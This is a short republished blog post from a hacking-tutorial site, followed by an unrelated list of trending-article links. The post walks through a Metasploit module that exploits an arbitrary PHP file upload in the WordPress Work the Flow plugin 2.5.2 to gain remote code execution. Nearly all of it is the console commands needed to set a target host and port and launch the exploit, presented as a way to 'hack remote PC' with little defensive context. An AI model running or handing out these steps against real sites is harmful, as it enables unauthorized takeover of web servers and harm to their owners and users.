Channel: Hacking Articles|Raj Chandel's Blog

↧

Hack Remote PC using Wordpress Work the Flow Upload Vulnerability

April 26, 2016, 9:55 am

≫ Next: Exploit Remote PC using WordPress Photo Gallery Unrestricted File Upload

≪ Previous: Hack Remote PC using Wordpress Ajax Load More PHP Upload Vulnerability

This module exploits an arbitrary PHP code upload in the WordPress Work the Flow plugin, version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution

Exploit Targets

Work the Flow plugin, version 2.5.2.

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_worktheflow_upload

msf exploit (wp_worktheflow_upload)>set targeturi wordpress

msf exploit (wp_worktheflow_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_worktheflow_upload)>set rport 80

msf exploit (wp_worktheflow_upload)>exploit

↧

Trending Articles

Windows Update / Microsoft Update の接続先 URL について

February 27, 2017, 12:32 am

Bureau of Internal Revenue: Regional Offices (Directory)

January 9, 2014, 11:06 pm

CC1310: wMBus example from application note not working

December 11, 2017, 1:35 am

Down-gradation of posts – Cadre Restructuring: Guidelines by Department of...

July 1, 2023, 10:32 pm

Juan Solórzano Sanclemente, 20, charged in Sexual Assault investigation,...

April 14, 2016, 5:31 am

አዋጅ ቁጥር 881-2007 የሙስና ወንጀሎችን ለመደንገግ የወጣ አዋጅ

February 17, 2020, 7:49 am

Updating SAP ASE with “sapdbctrl” (16.0.00.05 to 16.0.01.01)

May 3, 2015, 11:09 am

Allegra Freeman Mciver

August 22, 2018, 11:20 am

Nigeria 2018 Font for World Cup 2018 (TTF)

April 17, 2018, 7:43 pm

How to complain against a Navi loan?

August 1, 2024, 8:48 am

Rajasthan Board 10th Result 2016 Roll No wise & Name Wise

August 20, 2016, 5:13 pm

Practice Sheet of Modifier for HSC Students

September 19, 2019, 1:11 pm

ESENT データベース USS.jtx で、エラーイベント ID 490、454、489、455 が記録される事象について

November 5, 2018, 12:50 am

Main Rahoon ya Na Rahun Lyrics Translation | Bas Itna Hai Tumse Kehna

December 9, 2015, 10:40 am

EV2300 driver for windows10

June 9, 2016, 4:17 pm

Re: How to add a custom button on Application Toolbar for ME21N, ME22N & ME23N

March 29, 2016, 6:49 am

negative stock showing in my LX02

March 18, 2016, 5:42 am

Forcing Domain Admins to use AGPM (but not really)

June 21, 2011, 1:06 pm

Two more charged after drugs raids in Grimsby, Cleethorpes and Liverpool

April 28, 2014, 7:48 am

Forum Post: RE: Data import error: Import Create ISV code aborted the...

November 22, 2017, 1:46 am

© 2025 //www.rssing.com